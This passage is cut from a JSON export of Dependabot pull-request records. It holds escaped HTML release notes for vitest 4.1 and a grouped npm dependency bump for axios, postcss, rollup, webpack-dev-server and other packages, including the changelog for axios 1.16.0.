href=\"https://github.com/vitest-dev/vitest/commit/c8e6c7fbf\"\u003e\u003c!-- raw HTML omitted --\u003e(c8e6c)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExpose \u003ccode\u003erunTestFiles\u003c/code\u003e as alternative to \u003ccode\u003erunTestSpecifications\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9443\"\u003evitest-dev/vitest#9443\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/43d761821\"\u003e\u003c!-- raw HTML omitted --\u003e(43d76)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eallowWrite\u003c/code\u003e and \u003ccode\u003eallowExec\u003c/code\u003e options to \u003ccode\u003eapi\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9350\"\u003evitest-dev/vitest#9350\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/20e00ef78\"\u003e\u003c!-- raw HTML omitted --\u003e(20e00)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow passing down test cases to \u003ccode\u003etoTestSpecification\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9627\"\u003evitest-dev/vitest#9627\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/6f17d5ddf\"\u003e\u003c!-- raw HTML omitted --\u003e(6f17d)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ebrowser\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003euserEvent.wheel\u003c/code\u003e API  -  by \u003ca href=\"https://github.com/macarie\"\u003e\u003ccode\u003e@​macarie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9188\"\u003evitest-dev/vitest#9188\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/660801979\"\u003e\u003c!-- raw HTML omitted --\u003e(66080)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003efilterNode\u003c/code\u003e option to prettyDOM for filtering browser assertion error output  -  by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e, \u003cstrong\u003esheremet-va\u003c/strong\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9475\"\u003evitest-dev/vitest#9475\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/d3220fcd8\"\u003e\u003c!-- raw HTML omitted --\u003e(d3220)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport playwright persistent context  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e, \u003cstrong\u003eClaude Opus 4.6\u003c/strong\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9229\"\u003evitest-dev/vitest#9229\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/f865d2ba4\"\u003e\u003c!-- raw HTML omitted --\u003e(f865d)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003edetailsPanelPosition\u003c/code\u003e option and button  -  by \u003ca href=\"https://github.com/shairez\"\u003e\u003ccode\u003e@​shairez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9525\"\u003evitest-dev/vitest#9525\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c8a31147c\"\u003e\u003c!-- raw HTML omitted --\u003e(c8a31)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse BlazeDiff instead of pixelmatch  -  by \u003ca href=\"https://github.com/macarie\"\u003e\u003ccode\u003e@​macarie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9514\"\u003evitest-dev/vitest#9514\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/309362089\"\u003e\u003c!-- raw HTML omitted --\u003e(30936)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003efindElement\u003c/code\u003e and enable strict mode in webdriverio and preview  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9677\"\u003evitest-dev/vitest#9677\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c3f37721c\"\u003e\u003c!-- raw HTML omitted --\u003e(c3f37)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecli\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eAdd \u003ca href=\"https://github.com/bomb\"\u003e\u003ccode\u003e@​bomb\u003c/code\u003e\u003c/a\u003e.sh/tab completions  -  by \u003ca href=\"https://github.com/AmirSa12\"\u003e\u003ccode\u003e@​AmirSa12\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/8639\"\u003evitest-dev/vitest#8639\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/200f31704\"\u003e\u003c!-- raw HTML omitted --\u003e(200f3)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecoverage\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003eignore start/stop\u003c/code\u003e ignore hints  -  by \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9204\"\u003evitest-dev/vitest#9204\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e59c94ba6\"\u003e\u003c!-- raw HTML omitted --\u003e(e59c9)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003ecoverage.changed\u003c/code\u003e option to report only changed files  -  by \u003ca href=\"https://github.com/kykim00\"\u003e\u003ccode\u003e@​kykim00\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9521\"\u003evitest-dev/vitest#9521\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/1d9392c67\"\u003e\u003c!-- raw HTML omitted --\u003e(1d939)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eexperimental\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eonModuleRunner\u003c/code\u003e hook to \u003ccode\u003eworker.init\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9286\"\u003evitest-dev/vitest#9286\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e977f3deb\"\u003e\u003c!-- raw HTML omitted --\u003e(e977f)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOption to disable the module runner  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9210\"\u003evitest-dev/vitest#9210\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/9be6121ee\"\u003e\u003c!-- raw HTML omitted --\u003e(9be61)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitest-dev/vitest/commit/4150b913171bda3971a4a4c47c633c26d0c6ae45\"\u003e\u003ccode\u003e4150b91\u003c/code\u003e\u003c/a\u003e chore: release v4.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitest-dev/vitest/commit/1de0aa22dd6311a93546a75a3c58a6be519c1baf\"\u003e\u003ccode\u003e1de0aa2\u003c/code\u003e\u003c/a\u003e fix: correctly identify concurrent test during static analysis (\u003ca href=\"https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest/issues/9846\"\u003e#9846\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitest-dev/vitest/commit/c3cac1c1b5a...\n\n_Description has been truncated_","html_url":"https://github.com/c6ai/langchainjs/pull/25","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/c6ai%2Flangchainjs/issues/25","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/25/packages"},{"uuid":"4555980909","node_id":"PR_kwDON5hC5M7hBB4D","number":137,"state":"open","title":"chore(deps): bump the npm_and_yarn group across 13 directories with 12 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-30T23:17:51.000Z","updated_at":"2026-05-30T23:18:20.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":12,"packages":[{"name":"axios","old_version":"1.15.0","new_version":"1.16.0","repository_url":"https://github.com/axios/axios"},{"name":"postcss","old_version":"8.4.31","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"qs","old_version":"6.11.2","new_version":"6.15.2","repository_url":"https://github.com/ljharb/qs"},{"name":"webpack-dev-server","old_version":"3.3.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"rollup","old_version":"0.46.3","new_version":"2.80.0","repository_url":"https://github.com/rollup/rollup"},{"name":"simple-git","old_version":"3.32.3","new_version":"3.36.0","repository_url":"https://github.com/steveukx/git-js"},{"name":"ws","old_version":"6.2.2","new_version":"6.2.3","repository_url":"https://github.com/websockets/ws"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.15","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"pbkdf2","old_version":"3.0.17","new_version":"3.1.6","repository_url":"https://github.com/browserify/pbkdf2"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 9 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `1.15.0` | `1.16.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.4.31` | `8.5.10` |\n| [qs](https://github.com/ljharb/qs) | `6.11.2` | `6.15.2` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `3.3.1` | `5.2.4` |\n| [rollup](https://github.com/rollup/rollup) | `0.46.3` | `2.80.0` |\n| [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git) | `3.32.3` | `3.36.0` |\n| [ws](https://github.com/websockets/ws) | `6.2.2` | `6.2.3` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.15` |\n| [pbkdf2](https://github.com/browserify/pbkdf2) | `3.0.17` | `3.1.6` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/app directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/app/src/app/overmind/effects/vscode/LinterWorker directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 1 update in the /packages/browser-eslint-rules directory: [rollup](https://github.com/rollup/rollup).\nBumps the npm_and_yarn group with 4 updates in the /packages/notifications/example directory: [minimatch](https://github.com/isaacs/minimatch), [lodash](https://github.com/lodash/lodash), [brace-expansion](https://github.com/juliangruber/brace-expansion) and [pbkdf2](https://github.com/browserify/pbkdf2).\nBumps the npm_and_yarn group with 1 update in the /packages/sse-hooks directory: [rollup](https://github.com/rollup/rollup).\nBumps the npm_and_yarn group with 3 updates in the /standalone-packages/browser-jsdom directory: [qs](https://github.com/ljharb/qs), [brace-expansion](https://github.com/juliangruber/brace-expansion) and [pbkdf2](https://github.com/browserify/pbkdf2).\nBumps the npm_and_yarn group with 4 updates in the /standalone-packages/codesandbox-browserfs directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server), [rollup](https://github.com/rollup/rollup), [brace-expansion](https://github.com/juliangruber/brace-expansion) and [pbkdf2](https://github.com/browserify/pbkdf2).\nBumps the npm_and_yarn group with 1 update in the /standalone-packages/monaco-editor directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 2 updates in the /standalone-packages/sse-loading-screen directory: [axios](https://github.com/axios/axios) and [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 2 updates in the /standalone-packages/vscode-editor directory: [ws](https://github.com/websockets/ws) and [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 1 update in the /standalone-packages/vscode-extensions directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 1 update in the /standalone-packages/vscode-textmate directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\n\nUpdates `axios` from 1.15.0 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p\u003e\n\u003ch2\u003e⚠️ Notable Changes\u003c/h2\u003e\n\u003cp\u003eA handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFetch adapter now enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e and \u003ccode\u003emaxContentLength\u003c/code\u003e.\u003c/strong\u003e These limits were silently ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as a safety net (DoS protection, accidental large uploads) had no protection. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy requests now preserve user-supplied \u003ccode\u003eHost\u003c/code\u003e headers.\u003c/strong\u003e Previously, the proxy path could overwrite a custom \u003ccode\u003eHost\u003c/code\u003e. Virtual-host-style routing through a proxy will now behave correctly. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBasic auth credentials embedded in URLs are now URL-decoded.\u003c/strong\u003e If you have percent-encoded credentials in a URL (e.g. \u003ccode\u003ehttps://user:p%40ss@host\u003c/code\u003e), the decoded value is what now goes on the wire. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eparseProtocol\u003c/code\u003e now strictly requires a colon in the protocol separator.\u003c/strong\u003e Strings that loosely parsed as protocols before may no longer match. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecated \u003ccode\u003eunescape()\u003c/code\u003e replaced with modern UTF-8 encoding.\u003c/strong\u003e Non-ASCII URL handling is now spec-correct; consumers depending on legacy \u003ccode\u003eunescape()\u003c/code\u003e quirks may see different output bytes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003etransformRequest\u003c/code\u003e input typing change was reverted.\u003c/strong\u003e The typing change introduced in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e was reverted in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e after follow-up review — net behavior is unchanged from 1.15.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eQUERY HTTP Method:\u003c/strong\u003e Added support for the QUERY HTTP method across adapters and type definitions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10802\"\u003e#10802\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eECONNREFUSED Error Constant:\u003c/strong\u003e Exposed \u003ccode\u003eECONNREFUSED\u003c/code\u003e as a constant on \u003ccode\u003eAxiosError\u003c/code\u003e so callers can match connection-refused failures without comparing string literals (closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/6485\"\u003e#6485\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEncode Helper Export:\u003c/strong\u003e Exported the internal \u003ccode\u003eencode\u003c/code\u003e helper from \u003ccode\u003ebuildURL\u003c/code\u003e so userland param serializers can reuse the same encoding logic that axios uses internally. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6897\"\u003e#6897\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Redirects \u0026amp; Headers:\u003c/strong\u003e Cleared stale headers when a redirect targets a no-proxy host, fixed the redirect listener chain so listeners no longer stack across hops, restored the missing \u003ccode\u003erequestDetails\u003c/code\u003e argument on \u003ccode\u003ebeforeRedirect\u003c/code\u003e, preserved user-supplied \u003ccode\u003eHost\u003c/code\u003e headers when forwarding through a proxy, and properly URL-decoded basic auth credentials. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10794\"\u003e#10794\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10800\"\u003e#10800\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6241\"\u003e#6241\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Streams \u0026amp; Timeouts:\u003c/strong\u003e Preserved the partial response object on \u003ccode\u003eAxiosError\u003c/code\u003e when a stream is aborted after headers arrive, honoured the \u003ccode\u003etimeout\u003c/code\u003e option during the connect phase when redirects are disabled, and resolved an unsettled-promise hang when an aborted request was combined with compression and \u003ccode\u003emaxRedirects: 0\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10708\"\u003e#10708\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10819\"\u003e#10819\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7149\"\u003e#7149\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFetch Adapter:\u003c/strong\u003e Enforced \u003ccode\u003emaxBodyLength\u003c/code\u003e / \u003ccode\u003emaxContentLength\u003c/code\u003e in the fetch adapter, set the \u003ccode\u003eUser-Agent\u003c/code\u003e header to match the HTTP adapter, preserved the original abort reason instead of replacing it with a generic error, and deferred global access so importing the module no longer throws a \u003ccode\u003eTypeError\u003c/code\u003e in restricted environments. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10772\"\u003e#10772\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10806\"\u003e#10806\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7260\"\u003e#7260\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Adapter:\u003c/strong\u003e Unsubscribed the \u003ccode\u003ecancelToken\u003c/code\u003e and \u003ccode\u003eAbortSignal\u003c/code\u003e listeners on the error, timeout, and abort code paths to prevent leaked subscriptions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eError Handling:\u003c/strong\u003e Attached the parsed response to \u003ccode\u003eAxiosError\u003c/code\u003e when \u003ccode\u003eJSON.parse\u003c/code\u003e fails inside \u003ccode\u003edispatchRequest\u003c/code\u003e, prevented \u003ccode\u003esettle\u003c/code\u003e from emitting \u003ccode\u003eundefined\u003c/code\u003e error codes, and tightened the \u003ccode\u003eparseProtocol\u003c/code\u003e regex to require a colon in the protocol separator. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10724\"\u003e#10724\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7276\"\u003e#7276\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes \u0026amp; Exports:\u003c/strong\u003e Aligned the CommonJS \u003ccode\u003eCancelToken\u003c/code\u003e typings with the ESM build, fixed a compiler error caused by \u003ccode\u003eRawAxiosHeaders\u003c/code\u003e, and re-exported \u003ccode\u003ecreate\u003c/code\u003e from the package index. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7414\"\u003e#7414\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6389\"\u003e#6389\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6460\"\u003e#6460\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUTF-8 Encoding:\u003c/strong\u003e Replaced the deprecated \u003ccode\u003eunescape()\u003c/code\u003e call with a modern UTF-8 encoding implementation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMisc Cleanup:\u003c/strong\u003e Resolved a batch of small inconsistencies and gadget-level issues across the codebase. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10833\"\u003e#10833\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRefactor — ES6 Modernisation:\u003c/strong\u003e Modernised the \u003ccode\u003eutils\u003c/code\u003e module and XHR adapter to use ES6 features, and tidied the multipart boundary error message. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTests:\u003c/strong\u003e Hardened the HTTP test server lifecycle to fix flaky \u003ccode\u003eFormData\u003c/code\u003e EPIPE failures, fixed Win32 platform support for the pipe tests, and corrected an incorrect test assumption. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10820\"\u003e#10820\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10791\"\u003e#10791\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10796\"\u003e#10796\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs:\u003c/strong\u003e Documented \u003ccode\u003eparamsSerializer.encode\u003c/code\u003e for strict RFC 3986 query encoding, updated the \u003ccode\u003eparseReviver\u003c/code\u003e TypeScript definitions and configuration docs for ES2023, added timeout guidance to the README's first async example, and expanded notes around the recent type changes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10821\"\u003e#10821\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10782\"\u003e#10782\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10759\"\u003e#10759\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10804\"\u003e#10804\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReverted:\u003c/strong\u003e Reverted the \u003ccode\u003etransformRequest\u003c/code\u003e input typing change from \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e after follow-up review. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003eactions/setup-node\u003c/code\u003e, the \u003ccode\u003egithub-actions\u003c/code\u003e group, and \u003ccode\u003epostcss\u003c/code\u003e (in \u003ccode\u003e/docs\u003c/code\u003e) to their latest versions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10785\"\u003e#10785\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca 